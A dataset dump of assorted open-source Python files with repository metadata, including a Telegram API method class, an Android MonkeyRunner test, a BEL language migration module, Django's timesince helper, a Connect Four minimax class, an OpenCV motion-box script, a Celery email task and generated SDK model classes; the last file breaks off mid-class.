# # # # # # # # # # # # # # # # # # # # # # # #
# !!! WARNING !!! #
# This is a generated file! #
# All changes made in this file will be lost! #
# # # # # # # # # # # # # # # # # # # # # # # #
class GetLanguage(TLObject): # type: ignore
"""Telegram API method.
Details:
- Layer: ``122``
- ID: ``0x6a596502``
Parameters:
lang_pack: ``str``
lang_code: ``str``
Returns:
:obj:`LangPackLanguage <pyrogram.raw.base.LangPackLanguage>`
"""
__slots__: List[str] = ["lang_pack", "lang_code"]
ID = 0x6a596502
QUALNAME = "functions.langpack.GetLanguage"
def __init__(self, *, lang_pack: str, lang_code: str) -> None:
self.lang_pack = lang_pack # string
self.lang_code = lang_code # string
@staticmethod
def read(data: BytesIO, *args: Any) -> "GetLanguage":
# No flags
lang_pack = String.read(data)
lang_code = String.read(data)
return GetLanguage(lang_pack=lang_pack, lang_code=lang_code)
def write(self) -> bytes:
data = BytesIO()
data.write(Int(self.ID, False))
# No flags
data.write(String(self.lang_pack))
data.write(String(self.lang_code))
return data.getvalue()
| [
"[email protected]"
] | |
8bcd712f4be349d7fe2b89d4ff19355202af1010 | b2ba670818623f8ab18162382f7394baed97b7cb | /test-data/AndroidSlicer/Chart/DD/8.py | 09e5ae21e49aeca31e6e629fd56dbf73b0e2b860 | [
"MIT"
] | permissive | hsumyatwin/ESDroid-artifact | 012c26c40537a79b255da033e7b36d78086b743a | bff082c4daeeed62ceda3d715c07643203a0b44b | refs/heads/main | 2023-04-11T19:17:33.711133 | 2022-09-30T13:40:23 | 2022-09-30T13:40:23 | 303,378,286 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 990 | py | #start monkey test
import os;
from subprocess import Popen
from subprocess import PIPE
from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice, MonkeyImage
from com.android.monkeyrunner.MonkeyDevice import takeSnapshot
from com.android.monkeyrunner.easy import EasyMonkeyDevice
from com.android.monkeyrunner.easy import By
from com.android.chimpchat.hierarchyviewer import HierarchyViewer
from com.android.monkeyrunner import MonkeyView
import random
import sys
import subprocess
from sys import exit
from random import randint
device = MonkeyRunner.waitForConnection()
easy_device=EasyMonkeyDevice(device)
package = 'es.senselesssolutions.gpl.weightchart'
activity ='es.senselesssolutions.gpl.weightchart.ChartActivity'
runComponent = package+'/'+activity
device.startActivity(component=runComponent)
MonkeyRunner.sleep(1)
device.touch(487,1689, 'DOWN_AND_UP')
MonkeyRunner.sleep(1)
device.touch(1619,983, 'DOWN_AND_UP')
MonkeyRunner.sleep(1)
device.touch(558,1730, 'DOWN_AND_UP')
| [
"[email protected]"
] | |
4a2c91451796f219d51b74f12ba3c8156185b68d | 79041f273c057b2fbb115b35494b13250ac7a42c | /bel/lang/migrate_1_2.py | a33ee3c88896e423a30211e7b124513032101612 | [
"Apache-2.0"
] | permissive | belbio/bel | 3786b65a10d44735407b0e79c8489bea1df58863 | 14ff8e543a679e7dfff3f38f31c0f91ffd55e4d8 | refs/heads/master | 2022-12-08T23:02:28.242510 | 2020-12-21T16:17:47 | 2020-12-21T16:17:47 | 116,027,945 | 6 | 2 | Apache-2.0 | 2022-06-01T23:58:52 | 2018-01-02T15:14:32 | Python | UTF-8 | Python | false | false | 6,958 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Migrate BEL from 1 to 2.0.0
#
# Standard Library
import json
# Third Party
from loguru import logger
# Local
import bel.belspec.crud
import bel.core.settings as settings
from bel.belspec.crud import get_enhanced_belspec
from bel.lang.ast import BELAst, Function, NSArg, StrArg
from bel.lang.belobj import BEL
version = bel.belspec.crud.get_latest_version()
bo = BEL("", version=version)
belspec = get_enhanced_belspec(bo.version)
def migrate(belstr: str) -> str:
"""Migrate BEL 1 to 2.0.0
Args:
bel: BEL 1
Returns:
bel: BEL 2
"""
bo.parse(belstr)
return migrate_ast(bo.ast).to_string()
def migrate_into_triple(belstr: str) -> str:
"""Migrate BEL1 assertion into BEL 2.0.0 SRO triple"""
bo.parse(belstr)
return migrate_ast(bo.ast).to_triple()
def migrate_ast(ast: BELAst) -> BELAst:
# Process Subject
bo.ast.subject = convert(bo.ast.subject)
if bo.ast.object:
if bo.ast.object.type == "BELAst":
bo.ast.object.subject = convert(bo.ast.object.subject)
if bo.ast.object.object:
bo.ast.object.object = convert(bo.ast.object.object)
else:
bo.ast.object = convert(bo.ast.object)
return bo.ast
def convert(ast):
"""Convert BEL1 AST Function to BEL2 AST Function"""
if ast and ast.type == "Function":
# Activity function conversion
if (
ast.name != "molecularActivity"
and ast.name in belspec["namespaces"]["Activity"]["list"]
):
print("name", ast.name, "type", ast.type)
ast = convert_activity(ast)
return ast # Otherwise - this will trigger on the BEL2 molecularActivity
# translocation conversion
elif ast.name in ["tloc", "translocation"]:
ast = convert_tloc(ast)
fus_flag = False
for idx, arg in enumerate(ast.args):
if arg.__class__.__name__ == "Function":
# Fix substitution -> variation()
if arg.name in ["sub", "substitution"]:
ast.args[idx] = convert_sub(arg)
elif arg.name in ["trunc", "truncation"]:
ast.args[idx] = convert_trunc(arg)
elif arg.name in ["pmod", "proteinModification"]:
ast.args[idx] = convert_pmod(arg)
elif arg.name in ["fus", "fusion"]:
fus_flag = True
# Recursively process Functions
ast.args[idx] = convert(ast.args[idx])
if fus_flag:
ast = convert_fus(ast)
return ast
def convert_tloc(ast):
"""Convert BEL1 tloc() to BEL2"""
from_loc_arg = ast.args[1]
to_loc_arg = ast.args[2]
from_loc = Function("fromLoc", version=version, parent=ast)
from_loc.add_argument(NSArg(from_loc_arg.namespace, from_loc_arg.value, parent=from_loc))
to_loc = Function("toLoc", version=version, parent=ast)
to_loc.add_argument(NSArg(to_loc_arg.namespace, to_loc_arg.value, parent=to_loc))
ast.args[1] = from_loc
ast.args[2] = to_loc
return ast
def convert_activity(ast):
"""Convert BEL1 activities to BEL2 act()"""
if len(ast.args) > 1:
logger.error(f"Activity should not have more than 1 argument {ast.to_string()}")
p_arg = ast.args[0] # protein argument
print("p_arg", p_arg)
ma_arg = Function("ma", version=version)
ma_arg.add_argument(StrArg(ast.name, ma_arg))
p_arg.change_parent_fn(ma_arg)
ast = Function("activity", version=version)
p_arg.change_parent_fn(ast)
ast.add_argument(p_arg)
ast.add_argument(ma_arg)
return ast
def convert_pmod(pmod):
"""Update BEL1 pmod() protein modification term"""
if pmod.args[0].value in belspec["bel1_migration"]["protein_modifications"]:
pmod.args[0].value = belspec["bel1_migration"]["protein_modifications"][pmod.args[0].value]
return pmod
def convert_fus(ast):
"""Convert BEL1 fus() to BEL2 fus()"""
parent_fn_name = ast.name_short
prefix_list = {"p": "p.", "r": "r.", "g": "c."}
prefix = prefix_list[parent_fn_name]
fus1_ns = ast.args[0].namespace
fus1_val = ast.args[0].value
arg_fus = ast.args[1]
fus_args = [None, "?", "?"]
for idx, arg in enumerate(arg_fus.args):
fus_args[idx] = arg
fus2_ns = fus_args[0].namespace
fus2_val = fus_args[0].value
if fus_args[1] == "?":
fus1_range = fus_args[1]
else:
fus1_range = f'"{prefix}1_{fus_args[1].value}"'
if fus_args[2] == "?":
fus2_range = fus_args[2]
else:
fus2_range = f'"{prefix}{fus_args[2].value}_?"'
fus = Function("fus", version=version, parent=ast)
fus.args = [
NSArg(fus1_ns, fus1_val, fus),
StrArg(fus1_range, fus),
NSArg(fus2_ns, fus2_val, fus),
StrArg(fus2_range, fus),
]
# Remove BEL
ast_args = ast.args
ast_args.pop(0)
ast_args.pop(0)
if ast_args == [None]:
ast_args = []
ast.args = []
ast.add_argument(fus)
if len(ast_args) > 0:
ast.args.extend(ast_args)
return ast
def convert_sub(sub):
"""Convert BEL1 sub() to BEL2 var()"""
args = sub.args
(ref_aa, pos, new_aa) = args
parent_fn_name = sub.parent_function.name_short
prefix_list = {"p": "p.", "r": "r.", "g": "c."}
prefix = prefix_list[parent_fn_name]
new_var_arg = f'"{prefix}{belspec["namespaces"]["AminoAcid"]["to_short"][ref_aa.value]}{pos.value}{belspec["namespaces"]["AminoAcid"]["to_short"][new_aa.value]}"'
new_var = Function("var", version=version)
new_var.add_argument(StrArg(new_var_arg, new_var))
return new_var
def convert_trunc(trunc):
"""Convert BEL1 trunc() to BEL2 var()"""
parent_fn_name = trunc.parent_function.name_short
prefix_list = {"p": "p.", "r": "r.", "g": "c."}
prefix = prefix_list[parent_fn_name]
new_var_arg = f'"truncated at {trunc.args[0].value}"'
new_var = Function("var", version=version)
new_var.add_argument(StrArg(new_var_arg, new_var))
return new_var
def main():
# Local
import bel.lang.migrate_1_2
bel1 = "kin(p(HGNC:BRAF))"
bel1 = "p(HGNC:PIK3CA, sub(E, 545, K))"
# bel2 = 'p(HGNC:PIK3CA, var(p.Glu545Lys))'
bel1 = "r(HGNC:BCR, fus(HGNC:JAK2, 1875, 2626), pmod(P))"
bel2 = 'r(fus(HGNC:BCR, "r.1_1875", HGNC:JAK2, "r.2626_?"), pmod(Ph))'
# bel1 = 'p(HGNC:MAPK1, pmod(P, Thr, 185))'
# bel2 = 'p(HGNC:MAPK1, pmod(Ph, Thr, 185))'
# bel1 = 'tloc(p(HGNC:EGFR), MESHCL:Cytoplasm, MESHCL:"Cell Nucleus")'
# bel2 = 'tloc(p(HGNC:EGFR), fromLoc(MESHCL:Cytoplasm), toLoc(MESHCL:"Cell Nucleus"))'
# bel1 = 'p(HGNC:ABCA1, trunc(1851))'
# bel2 = 'p(HGNC:ABCA1, var("truncated at 1851"))'
bel2 = bel.lang.migrate_1_2.migrate(bel1)
print("BEL2", bel2)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
206146ddffedd60bf477a416ab75b3c14e9f720f | 758bf41e46a3093f4923af603f1f7f8063408b9c | /website/testFromRemoteRepo/_bsch3398/museum/python/django/utils/timesince.py | 55e53c65cfc601a4fa7399ed0b4d33d81b8588c3 | [] | no_license | mpetyx/mpetyx.com | 4033d97b21c9227a6ba505980fd0c1b57254e8fb | d50c379b4fe09e0135656573f7049225fc90ae36 | refs/heads/master | 2021-01-10T19:50:15.488371 | 2014-01-22T09:04:14 | 2014-01-22T09:04:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,698 | py | import datetime
from django.utils.tzinfo import LocalTimezone
from django.utils.translation import ungettext, ugettext
def timesince(d, now=None):
"""
Takes two datetime objects and returns the time between d and now
as a nicely formatted string, e.g. "10 minutes". If d occurs after now,
then "0 minutes" is returned.
Units used are years, months, weeks, days, hours, and minutes.
Seconds and microseconds are ignored. Up to two adjacent units will be
displayed. For example, "2 weeks, 3 days" and "1 year, 3 months" are
possible outputs, but "2 weeks, 3 hours" and "1 year, 5 days" are not.
Adapted from http://blog.natbat.co.uk/archive/2003/Jun/14/time_since
"""
chunks = (
(60 * 60 * 24 * 365, lambda n: ungettext('year', 'years', n)),
(60 * 60 * 24 * 30, lambda n: ungettext('month', 'months', n)),
(60 * 60 * 24 * 7, lambda n: ungettext('week', 'weeks', n)),
(60 * 60 * 24, lambda n: ungettext('day', 'days', n)),
(60 * 60, lambda n: ungettext('hour', 'hours', n)),
(60, lambda n: ungettext('minute', 'minutes', n))
)
# Convert datetime.date to datetime.datetime for comparison.
if not isinstance(d, datetime.datetime):
d = datetime.datetime(d.year, d.month, d.day)
if now and not isinstance(now, datetime.datetime):
now = datetime.datetime(now.year, now.month, now.day)
if not now:
if d.tzinfo:
now = datetime.datetime.now(LocalTimezone(d))
else:
now = datetime.datetime.now()
# ignore microsecond part of 'd' since we removed it from 'now'
delta = now - (d - datetime.timedelta(0, 0, d.microsecond))
since = delta.days * 24 * 60 * 60 + delta.seconds
if since <= 0:
# d is in the future compared to now, stop processing.
return u'0 ' + ugettext('minutes')
for i, (seconds, name) in enumerate(chunks):
count = since // seconds
if count != 0:
break
s = ugettext('%(number)d %(type)s') % {'number': count, 'type': name(count)}
if i + 1 < len(chunks):
# Now get the second item
seconds2, name2 = chunks[i + 1]
count2 = (since - (seconds * count)) // seconds2
if count2 != 0:
s += ugettext(', %(number)d %(type)s') % {'number': count2, 'type': name2(count2)}
return s
def timeuntil(d, now=None):
"""
Like timesince, but returns a string measuring the time until
the given time.
"""
if not now:
if getattr(d, 'tzinfo', None):
now = datetime.datetime.now(LocalTimezone(d))
else:
now = datetime.datetime.now()
return timesince(now, d)
| [
"[email protected]"
] | |
df004da63a64bed312c2d45ad9d337333d93d167 | 2160b580f64693eb8a27afc58dbdff9363247e3f | /doc2dash/parsers/__init__.py | 164faf6c4ec769dfc84c4a88ad42ba11ba703c48 | [
"MIT"
] | permissive | pombredanne/doc2dash | fa65fc4428d03c1be9dbdfdb5b311d37c439c3ae | c2f342a74b596d3e0470f9ac69f73c9aef1fc7bd | refs/heads/master | 2021-01-16T19:30:41.265173 | 2014-08-14T08:12:10 | 2014-08-14T08:13:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | from __future__ import absolute_import, division, print_function
from . import pydoctor, sphinx, intersphinx
DOCTYPES = [
intersphinx.InterSphinxParser,
sphinx.SphinxParser,
pydoctor.PyDoctorParser,
]
def get_doctype(path):
"""
    Gets the appropriate doctype for *path*.
"""
for dt in DOCTYPES:
if dt.detect(path):
return dt
else:
return None
| [
"[email protected]"
] | |
6cd48226c2b5daa5312ca2232f47327b3926aa63 | 7e6864c5c48317a590ed6cc9b2acb85754bcda3b | /app/bin/back_end_scripts/minimax.py | 7a7839692657faffc8427321758349942d25078c | [
"MIT"
] | permissive | michaelneuder/connect_four | f83d8c1adf03af14632ab1acb23cc79ea5a3f035 | de2a1d7296ffddaee4282b722775225cdfbe6304 | refs/heads/master | 2021-01-20T10:06:56.505978 | 2017-06-05T23:04:34 | 2017-06-05T23:04:34 | 83,929,928 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,084 | py | #!/usr/bin/env python3
import numpy as np
import random as rand
class minimax(object):
def __init__(self, current_board, move_number):
self.board = current_board
self.number_rows = 6
self.number_cols = 7
self.move_number = move_number
self.right_diag_1 = []
self.right_diag_2 = []
self.right_diag_3 = []
self.right_diag_4 = []
self.right_diag_5 = []
self.right_diag_6 = []
self.left_diag_1 = []
self.left_diag_2 = []
self.left_diag_3 = []
self.left_diag_4 = []
self.left_diag_5 = []
self.left_diag_6 = []
self.diag_set = []
self.two_set = []
self.update_diags()
def update_diags(self):
self.right_diag_1 = [self.board[3,0],self.board[2,1],self.board[1,2],self.board[0,3]]
self.right_diag_2 = [self.board[4,0],self.board[3,1],self.board[2,2],self.board[1,3],
self.board[0,4]]
self.right_diag_3 = [self.board[5,0],self.board[4,1],self.board[3,2],self.board[2,3],
self.board[1,4],self.board[0,5]]
self.right_diag_4 = [self.board[5,1],self.board[4,2],self.board[3,3],self.board[2,4],
self.board[1,5],self.board[0,6]]
self.right_diag_5 = [self.board[5,2],self.board[4,3],self.board[3,4],self.board[2,5],
self.board[1,6]]
self.right_diag_6 = [self.board[5,3],self.board[4,4],self.board[3,5],self.board[2,6]]
self.left_diag_1 = [self.board[3,6],self.board[2,5],self.board[1,4],self.board[0,3]]
self.left_diag_2 = [self.board[4,6],self.board[3,5],self.board[2,4],self.board[1,3],
self.board[0,2]]
self.left_diag_3 = [self.board[5,6],self.board[4,5],self.board[3,4],self.board[2,3],
self.board[1,2],self.board[0,1]]
self.left_diag_4 = [self.board[5,5],self.board[4,4],self.board[3,3],self.board[2,2],
self.board[1,1],self.board[0,0]]
self.left_diag_5 = [self.board[5,4],self.board[4,3],self.board[3,2],self.board[2,1],
self.board[1,0]]
self.left_diag_6 = [self.board[5,3],self.board[4,2],self.board[3,1],self.board[2,0]]
self.diag_set = [self.right_diag_1, self.right_diag_2, self.right_diag_3,
self.right_diag_4, self.right_diag_5, self.right_diag_6,
self.left_diag_1, self.left_diag_2, self.left_diag_3,
self.left_diag_4, self.left_diag_5, self.left_diag_6]
def find_twos_rows(self, color):
number_of_twos = 0
'''
checking for twos along the rows. this gets complicated, because we
only want to count twos that could be part of a future connect four.
        thus we have to make sure that there are enough empty cells around each
set of two before we count it.
----------------------------------------------------------------------
these are the options: 0011, 0101, 0110, 1001, 1010, 1100
'''
for row in range(self.number_rows):
for col in range(self.number_cols-1):
if( (col-2) > -1 and (col+2 >= self.number_cols or self.board[row][col+2] != color)):
if(self.board[row][col] == self.board[row][col+1] == color
and self.board[row][col-1] == self.board[row][col-2] == 0):
number_of_twos += 1
                elif( (col-1) > -1 and (col+2) < self.number_cols ):
                    # patterns 0101 and 0110 need the same bounds (col-1 .. col+2),
                    # so both are checked under this single guard
                    if(self.board[row][col] == self.board[row][col+2] == color
                       and (self.board[row][col-1] == self.board[row][col+1] == 0)):
                        number_of_twos += 1
                    elif(self.board[row][col] == self.board[row][col+1] == color
                         and (self.board[row][col-1] == self.board[row][col+2] == 0)):
                        number_of_twos += 1
elif( (col+3) < self.number_cols):
if(self.board[row][col] == self.board[row][col+3] == color
and self.board[row][col+1] == self.board[row][col+2] == 0):
number_of_twos += 1
elif(self.board[row][col] == self.board[row][col+2] == color
and self.board[row][col+1] == self.board[row][col+3] == 0):
number_of_twos += 1
elif(self.board[row][col] == self.board[row][col+1] == color
and self.board[row][col+2] == self.board[row][col+3] == 0):
number_of_twos += 1
return number_of_twos
def find_twos_rows_test(self, color):
'''
checking for twos along the rows. this gets complicated, because we
only want to count twos that could be part of a future connect four.
        thus we have to make sure that there are enough empty cells around each
set of two before we count it.
----------------------------------------------------------------------
these are the options: 0011, 0101, 0110, 1001, 1010, 1100
'''
number_of_twos = 0
set_to_check = []
for row in range(self.number_rows):
for col in range(self.number_cols-3):
set_to_check.append([self.board[row][col+i] for i in range(4)])
for set_ in set_to_check:
num_color = 0
num_empty = 0
for cell in set_:
if(cell == 0):
num_empty += 1
elif(cell == color):
num_color += 1
if(num_color == num_empty == 2):
number_of_twos += 1
return number_of_twos
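    # Illustrative example (hypothetical board row): for color=1, a row such as
    # [0, 1, 1, 0, 2, 0, 0] yields the 4-cell windows [0,1,1,0], [1,1,0,2],
    # [1,0,2,0], [0,2,0,0]; only the first window has exactly two empty cells
    # and two cells of color 1, so a board containing just that pattern would
    # make this method return 1.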
def find_twos_cols(self, color):
number_of_twos = 0
'''
checking for twos along the col. this is pretty easy as the only way a
        two in a row along a column can be a part of a connect four is if the piece
immediately above the two is empty.
'''
for col in range(self.number_cols):
            # start at row 2 so that row-1 and row-2 stay on the board
            # (negative indices would wrap around to the bottom of the column)
            for row in range(2, self.number_rows):
                if(self.board[row][col] == self.board[row-1][col] == color
                   and self.board[row-2][col] == 0):
                    number_of_twos += 1
return number_of_twos
def find_twos_diags(self, color):
'''
this is similar to finding twos in rows. there are three options for
two in a rows that have potential to be a win. 0011, 0110, 1100. these
each are examined in the context of the diagonal. this is the reason
that the diagonal lists are necessary
'''
number_of_twos = 0
for diag in self.diag_set:
diagonal_length = len(diag)
for i in range(diagonal_length-1):
if( (i+3) < diagonal_length):
if(diag[i] == diag[i+1] == color and diag[i+2] == diag[i+3] == 0):
number_of_twos += 1
print('found')
elif( (i-1) > -1 and (i+2) < diagonal_length):
if(diag[i] == diag[i+1] == color and diag[i-1] == diag[i+2] == 0):
number_of_twos += 1
print('found')
elif( (i-2) > -1):
if(diag[i] == diag[i+1] == color and diag[i-1] == diag[i-2] == 0):
number_of_twos += 1
print('found')
return number_of_twos
def evaluate_board(self):
# (2 in a rows)*10 + (3 in a rows)*1000 + (4 in a row)*100000
evaluation = 10
return evaluation
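    # evaluate_board is still a stub: the comment above describes the intended
    # weighting, but only the find_twos_* helpers exist in this class so far.
    # A sketch of the intended scoring (find_threes_* / find_fours_* are
    # hypothetical helpers that are not implemented here) might look like:
    #
    #   twos = self.find_twos_rows(color) + self.find_twos_cols(color) + self.find_twos_diags(color)
    #   evaluation = twos * 10 + threes * 1000 + fours * 100000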
def main():
print("\nminimax ai algorithm --- connect four\n")
sample_board = np.array([[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,2,0,1,2,0],
[0,1,2,1,2,2,2],
[2,1,1,2,1,1,1]])
minimax_ = minimax(sample_board, 16)
print(minimax_.find_twos_rows_test(1))
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
f69504729af79407f2cc3c37688aedfdbe190a0d | 1719920a92f7194766624474b98d59ef8d6eddaf | /models/device_enrollment_configuration.py | 9e22612e3cb2ffb4bf77a9608e129ccf5936870e | [
"MIT"
] | permissive | MIchaelMainer/msgraph-v10-models-python | cfa5e3a65ba675383975a99779763211ed9fa0a9 | adad66363ebe151be2332f3ef74a664584385748 | refs/heads/master | 2020-03-19T12:51:06.370673 | 2018-06-08T00:16:12 | 2018-06-08T00:16:12 | 136,544,573 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,747 | py | # -*- coding: utf-8 -*-
'''
# Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
#
# This file was generated and any changes will be overwritten.
'''
from __future__ import unicode_literals
from ..model.enrollment_configuration_assignment import EnrollmentConfigurationAssignment
from datetime import datetime
from ..one_drive_object_base import OneDriveObjectBase
# import path assumed from the AssignmentsCollectionPage reference in the
# assignments property's docstring; adjust if the generated package layout differs
from ..request.assignments_collection import AssignmentsCollectionPage
class DeviceEnrollmentConfiguration(OneDriveObjectBase):
def __init__(self, prop_dict={}):
self._prop_dict = prop_dict
@property
def display_name(self):
"""
Gets and sets the displayName
Returns:
str:
The displayName
"""
if "displayName" in self._prop_dict:
return self._prop_dict["displayName"]
else:
return None
@display_name.setter
def display_name(self, val):
self._prop_dict["displayName"] = val
@property
def description(self):
"""
Gets and sets the description
Returns:
str:
The description
"""
if "description" in self._prop_dict:
return self._prop_dict["description"]
else:
return None
@description.setter
def description(self, val):
self._prop_dict["description"] = val
@property
def priority(self):
"""
Gets and sets the priority
Returns:
int:
The priority
"""
if "priority" in self._prop_dict:
return self._prop_dict["priority"]
else:
return None
@priority.setter
def priority(self, val):
self._prop_dict["priority"] = val
@property
def created_date_time(self):
"""
Gets and sets the createdDateTime
Returns:
datetime:
The createdDateTime
"""
if "createdDateTime" in self._prop_dict:
return datetime.strptime(self._prop_dict["createdDateTime"].replace("Z", ""), "%Y-%m-%dT%H:%M:%S.%f")
else:
return None
@created_date_time.setter
def created_date_time(self, val):
self._prop_dict["createdDateTime"] = val.isoformat()+"Z"
@property
def last_modified_date_time(self):
"""
Gets and sets the lastModifiedDateTime
Returns:
datetime:
The lastModifiedDateTime
"""
if "lastModifiedDateTime" in self._prop_dict:
return datetime.strptime(self._prop_dict["lastModifiedDateTime"].replace("Z", ""), "%Y-%m-%dT%H:%M:%S.%f")
else:
return None
@last_modified_date_time.setter
def last_modified_date_time(self, val):
self._prop_dict["lastModifiedDateTime"] = val.isoformat()+"Z"
@property
def version(self):
"""
Gets and sets the version
Returns:
int:
The version
"""
if "version" in self._prop_dict:
return self._prop_dict["version"]
else:
return None
@version.setter
def version(self, val):
self._prop_dict["version"] = val
@property
def assignments(self):
"""Gets and sets the assignments
Returns:
:class:`AssignmentsCollectionPage<onedrivesdk.request.assignments_collection.AssignmentsCollectionPage>`:
The assignments
"""
if "assignments" in self._prop_dict:
return AssignmentsCollectionPage(self._prop_dict["assignments"])
else:
return None
| [
"[email protected]"
] | |
e15ab783b8524095dfce9416304b9b29b70fb815 | f9357dc6ebe6ae1af0b03a9afc5f765706b8d31f | /cv2_functions/cv2_minbox.py | 9614fc7f0d142f6072a8812d1af97c5d594b277c | [] | no_license | cilame/any-whim | 660acd966048655aa36886047fbc232539807881 | 1520accbe1506a133989a6c2be17572e7fb4693e | refs/heads/master | 2023-08-17T05:10:56.348200 | 2023-08-13T16:45:11 | 2023-08-13T16:45:11 | 110,548,292 | 125 | 64 | null | null | null | null | UTF-8 | Python | false | false | 913 | py | import cv2
s = cv2.createBackgroundSubtractorMOG2(varThreshold=100)
f = cv2.VideoCapture(0)
while(1):
a,v = f.read()
g = s.apply(v)
g = cv2.morphologyEx(g,cv2.MORPH_DILATE,(7,7),iterations=7)
    a,b,c = cv2.findContours(g,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) # OpenCV 3.x API: returns (image, contours, hierarchy)
for i in b:
#print cv2.minAreaRect(i)
x1,x2,x3,x4 = cv2.boxPoints(cv2.minAreaRect(i))
if sum((x1-x2)**2)>20 and sum((x2-x3)**2)>20:
x1 = tuple(x1)
x2 = tuple(x2)
x3 = tuple(x3)
x4 = tuple(x4)
cv2.line(v,x1,x2,(0,255,0))
cv2.line(v,x2,x3,(0,255,0))
cv2.line(v,x3,x4,(0,255,0))
cv2.line(v,x4,x1,(0,255,0))
#if w>10 and h>10:cv2.rectangle(v,(x,y),(x+w,y+h),(0,255,0),1)
cv2.imshow('nier1',v)
cv2.imshow('nier',g)
    if cv2.waitKey(42)==ord(' '): # ~42 ms per frame; exit when the spacebar is pressed
break
f.release()
cv2.destroyAllWindows()
| [
"[email protected]"
] | |
b58e705deed2f0b8a2254709321b6101b634b952 | fcc6fa7905b6045a68b992c74e5301e00d5dd3d3 | /users/tasks.py | bf40dc7db3c53264f1f01878dcefd90681f297b2 | [] | no_license | alinzel/BookStore | cc394c9935155c7fda29aa105edd1e9914bd94aa | 5dfbf13182ce19dfae4d7f8b443cd8e7a54d1204 | refs/heads/master | 2020-03-07T03:22:18.771701 | 2018-03-29T08:00:19 | 2018-03-29T08:00:19 | 127,233,714 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 795 | py | from __future__ import absolute_import,unicode_literals
from celery import shared_task
from django.conf import settings
from django.core.mail import send_mail
# send the account-activation email
@shared_task # shared task: returns a proxy that always uses the task instance from current_app
def send_active_email(token, username, email):
    subject = '尚硅谷书城用户激活链接' # email subject (activation-link title for the bookstore site)
    message = '你好' + username # plain-text body: greeting ("你好" = "Hello") plus the username
    sender = settings.EMAIL_FROM # sender address shown to the recipient
    receiver = [email] # recipient mailbox
    # activation link
    html_message = '<a href="http://127.0.0.1:8000/user/active/%s/">http://127.0.0.1:8000/user/active/</a>'%token
    # send the email containing the activation link
    send_mail(subject, message, sender, receiver, html_message=html_message)
# TODO: command to start the celery worker
# celery -A bookstore worker -l info
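# Illustrative call site (hypothetical view code): the task is normally queued
# asynchronously with celery's .delay() shortcut rather than called directly:
#   send_active_email.delay(token, username, email)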
| [
"[email protected]"
] | |
230d26e5c2b5c4bc19665857dfe972ec6b36874b | b15d2787a1eeb56dfa700480364337216d2b1eb9 | /accelbyte_py_sdk/api/platform/models/client_request_parameter.py | 9f7b1f469cdc712522fbd02313e75c9d9297b6f3 | [
"MIT"
] | permissive | AccelByte/accelbyte-python-sdk | dedf3b8a592beef5fcf86b4245678ee3277f953d | 539c617c7e6938892fa49f95585b2a45c97a59e0 | refs/heads/main | 2023-08-24T14:38:04.370340 | 2023-08-22T01:08:03 | 2023-08-22T01:08:03 | 410,735,805 | 2 | 1 | MIT | 2022-08-02T03:54:11 | 2021-09-27T04:00:10 | Python | UTF-8 | Python | false | false | 6,030 | py | # Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: ags_py_codegen
# AccelByte Gaming Services Platform Service (4.32.1)
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from __future__ import annotations
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import Model
class ClientRequestParameter(Model):
"""Client request parameter (ClientRequestParameter)
Properties:
currency_code: (currencyCode) OPTIONAL str
language: (language) OPTIONAL str
price: (price) OPTIONAL float
region: (region) OPTIONAL str
"""
# region fields
currency_code: str # OPTIONAL
language: str # OPTIONAL
price: float # OPTIONAL
region: str # OPTIONAL
# endregion fields
# region with_x methods
def with_currency_code(self, value: str) -> ClientRequestParameter:
self.currency_code = value
return self
def with_language(self, value: str) -> ClientRequestParameter:
self.language = value
return self
def with_price(self, value: float) -> ClientRequestParameter:
self.price = value
return self
def with_region(self, value: str) -> ClientRequestParameter:
self.region = value
return self
# endregion with_x methods
# region to methods
def to_dict(self, include_empty: bool = False) -> dict:
result: dict = {}
if hasattr(self, "currency_code"):
result["currencyCode"] = str(self.currency_code)
elif include_empty:
result["currencyCode"] = ""
if hasattr(self, "language"):
result["language"] = str(self.language)
elif include_empty:
result["language"] = ""
if hasattr(self, "price"):
result["price"] = float(self.price)
elif include_empty:
result["price"] = 0.0
if hasattr(self, "region"):
result["region"] = str(self.region)
elif include_empty:
result["region"] = ""
return result
# endregion to methods
# region static methods
@classmethod
def create(
cls,
currency_code: Optional[str] = None,
language: Optional[str] = None,
price: Optional[float] = None,
region: Optional[str] = None,
**kwargs,
) -> ClientRequestParameter:
instance = cls()
if currency_code is not None:
instance.currency_code = currency_code
if language is not None:
instance.language = language
if price is not None:
instance.price = price
if region is not None:
instance.region = region
return instance
@classmethod
def create_from_dict(
cls, dict_: dict, include_empty: bool = False
) -> ClientRequestParameter:
instance = cls()
if not dict_:
return instance
if "currencyCode" in dict_ and dict_["currencyCode"] is not None:
instance.currency_code = str(dict_["currencyCode"])
elif include_empty:
instance.currency_code = ""
if "language" in dict_ and dict_["language"] is not None:
instance.language = str(dict_["language"])
elif include_empty:
instance.language = ""
if "price" in dict_ and dict_["price"] is not None:
instance.price = float(dict_["price"])
elif include_empty:
instance.price = 0.0
if "region" in dict_ and dict_["region"] is not None:
instance.region = str(dict_["region"])
elif include_empty:
instance.region = ""
return instance
@classmethod
def create_many_from_dict(
